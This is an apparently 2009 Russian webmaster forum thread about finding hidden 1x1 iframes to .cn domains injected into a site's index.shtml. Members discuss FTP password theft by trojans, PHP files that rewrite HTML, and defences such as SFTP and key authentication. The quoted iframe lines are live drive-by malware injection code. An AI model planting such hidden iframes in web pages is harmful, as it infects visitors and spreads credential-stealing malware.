Реклама на сайте Advertise with us

Вопрос о index.shtml

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 23.03.09
Сообщения: 14
Рейтинг: 3

Ссылка на сообщениеДобавлено: 12/04/09 в 20:54       Ответить с цитатойцитата 

доделывал топ, надо было добавить кое что в индекс.схтмл, и случайным образом наткнулся на строчку в коде

<iframe src="http://lotante.cn/in.cgi?income38" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://thelotbet.cn/in.cgi?income40" width=1 height=1 style="visibility: hidden"></iframe>


вопос: откуда она там могла взяться? права вроде настроены так что индекс могу менять только я... если ктонить встречался с этим помогите плиз!

0
 



С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970

Ссылка на сообщениеДобавлено: 12/04/09 в 20:59       Ответить с цитатойцитата 

Может пароль от ФТП свистнули. Сходи в венерологический.

0
 

Добрый ОС :=)

С нами с 12.04.04
Сообщения: 8343
Рейтинг: 3293

Ссылка на сообщениеДобавлено: 12/04/09 в 21:34       Ответить с цитатойцитата 

Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить icon_evil.gif Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.

Работа вебкам моделью - работай из дома и зарабатывай большие деньги!

0
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 12/04/09 в 21:45       Ответить с цитатойцитата 

0
 
+
сам дебил

С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822

Ссылка на сообщениеДобавлено: 12/04/09 в 22:41       Ответить с цитатойцитата 

чекай свою систему локальную если на всех фтп аккаунтах так

Очень много трафика...
и тут еще трафик

0
 



С нами с 22.03.09
Сообщения: 1691
Рейтинг: 2478

Ссылка на сообщениеДобавлено: 13/04/09 в 01:23       Ответить с цитатойцитата 

Тоже самое было. Трояном вытянули пароль к фтп видимо.
Добрые люди посоветовали авиру(http://www.free-av.com/) и всё стало впорядке, как после нода нашёл 35 вирусов icon_mrgreen.gif
Подумываю перейти на платную версию авиры icon_wink.gif

hostiserver.com - Хостинг под КВС и Смарт, чтобы работало быстро

0
 



С нами с 18.11.99
Сообщения: 14226

Ссылка на сообщениеДобавлено: 13/04/09 в 01:47       Ответить с цитатойцитата 

Ставь SFTP и оставляй доступ только со своего IP.
И все проблемы исчезнут.

Участник!
Покупаем CJ-tube и галлерный трафик + 100$ за регистрацию

0
 



С нами с 22.03.09
Сообщения: 1691
Рейтинг: 2478

Ссылка на сообщениеДобавлено: 13/04/09 в 01:48       Ответить с цитатойцитата 

а если айпи динамический?)

hostiserver.com - Хостинг под КВС и Смарт, чтобы работало быстро

0
 



С нами с 10.04.04
Сообщения: 2526
Рейтинг: 1447

Ссылка на сообщениеДобавлено: 13/04/09 в 02:58       Ответить с цитатойцитата 

WASP писал:
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить icon_evil.gif Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.


Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.

Это не я должен предлагать тебе деньги, а ты должен убедить меня заплатить тебе.

0
 



С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144

Ссылка на сообщениеДобавлено: 13/04/09 в 03:41       Ответить с цитатойцитата 

nosferatu писал:
а если айпи динамический?)


Делай доступ по ключам, а не по логину/паролю. Ключ можешь в USB token засунуть в неэкспортируемом виде, тогда точно никто никогда не стырит...

Моя подпись.

0
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 13/04/09 в 04:10       Ответить с цитатойцитата 

Сплоит относительно новый и в паблике его нет. Пока. )
Так что господа сиджеводы - готовьтесь.

Заражение происходит при посещении инфицированных страницы. Если при этом в браузере разрешено выполнение JScript и у вас есть права администратора, то вы попали. Однозначно.
И никакие антивирусы вас не спасут, так как это не просто "вирус" (если быть точным, то это вообще не вирус), а набор скриптов, эксплуатирующих различные актуальные уязвимости. И полагать, что после того как антивирус отрапортовал об удалении "вируса", вы чисты - просто наивно.
А если антивирус даже не среагировал и вы продолжали работать, то чего уж тогда удивлятся, что у вас утянули пароли.
Никакие баны по IP, как вы понимаете - не помогут, так как шелы заливаются с вашей машины.

Здесь список известных на сегодня атакующих серверов:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Domain&…amp;page=0

Хочу ещё раз подчеркнуть, что ни один антивирус не сможет полностью удалить такую заразу, если вы работали под учётной записью администратора. А большинство из них даже не среагирует.

0
 

Прощай рейтинг

С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808

Ссылка на сообщениеДобавлено: 13/04/09 в 05:55       Ответить с цитатойцитата 

Yacc: Ебать страху то нагнал, я чуть винчь не отформатировал smail101.gif

0
 



С нами с 23.03.09
Сообщения: 14
Рейтинг: 3

Ссылка на сообщениеДобавлено: 13/04/09 в 22:53       Ответить с цитатойцитата 

Вчера почистил индекс, пока нормально, попозже посмотрим что будет.

На остальных доменах пока все спокойно...

0
 



С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144

Ссылка на сообщениеДобавлено: 14/04/09 в 00:14       Ответить с цитатойцитата 

Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль? icon_smile.gif

Моя подпись.

0
 



С нами с 05.02.07
Сообщения: 286
Рейтинг: 222

Ссылка на сообщениеДобавлено: 14/04/09 в 01:12       Ответить с цитатойцитата 


А что, кто-то еще использует ftp? smail101.gif

0
 



С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138

Ссылка на сообщениеДобавлено: 14/04/09 в 01:41       Ответить с цитатойцитата 

на вебазилле все отфильтровано слава богу по дефолту icon_surprised.gif

0
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 14/04/09 в 01:44       Ответить с цитатойцитата 

А что кто-то ещё не знает о существование приватных сборок фтп-грабберов стоимостью $5k? icon_smile.gif

0
 



С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138

Ссылка на сообщениеДобавлено: 14/04/09 в 01:58       Ответить с цитатойцитата 

кинь пару ссылок народу почитать, я тоже приватную сборку жигулей видел за двацатник

0
 

размещу

С нами с 30.12.00
Сообщения: 4800
Рейтинг: 1304

Ссылка на сообщениеДобавлено: 14/04/09 в 12:09       Ответить с цитатойцитата 

оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешьicon_smile.gif

ЗЫ: я не о тс icon_smile.gif

0
 



С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138

Ссылка на сообщениеДобавлено: 14/04/09 в 12:22       Ответить с цитатойцитата 

нуда заранее себя документируют smail101.gif

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 14/04/09 в 16:56       Ответить с цитатойцитата 

gimcnuk писал:
Может пароль от ФТП свистнули. Сходи в венерологический.

скорее через скрипты поломали

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 
+ +
www.b52hosting.com Хостинг

С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147

Ссылка на сообщениеДобавлено: 22/04/09 в 21:50       Ответить с цитатойцитата 

lega_cobra писал:
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль? icon_smile.gif


Нет.

Хостинг 100Gb трафа за 5$ в месяц для порно сайтов WMZ Hosting Adult Сидж CJ

0
 
+ +
www.b52hosting.com Хостинг

С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147

Ссылка на сообщениеДобавлено: 22/04/09 в 21:53       Ответить с цитатойцитата 

Stup писал:
Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.


Это если на сервере так настроены виртуальные хосты что через PHP можно зайти в чужую папку. А если все НОРМАЛЬНО как нада настроено - то получив доступ к одному FTP только с файлами на этом FTP можно и орудовать.

Хостинг 100Gb трафа за 5$ в месяц для порно сайтов WMZ Hosting Adult Сидж CJ

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 22/04/09 в 21:54       Ответить с цитатойцитата 

Цитата:
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь

ЗЫ: я не о тс


Оффтопик: Думаю "чё-то Teval молчит в аське на вопрос о трейде, с чего бы ... " а он, оказывается, посты перечитывает smail101.gif

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 23/04/09 в 01:06       Ответить с цитатойцитата 

dlk44 писал:
Нет.

почему нет? у нас процентов около 5 клиентов удалось перевести )) остальные не хотят )

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »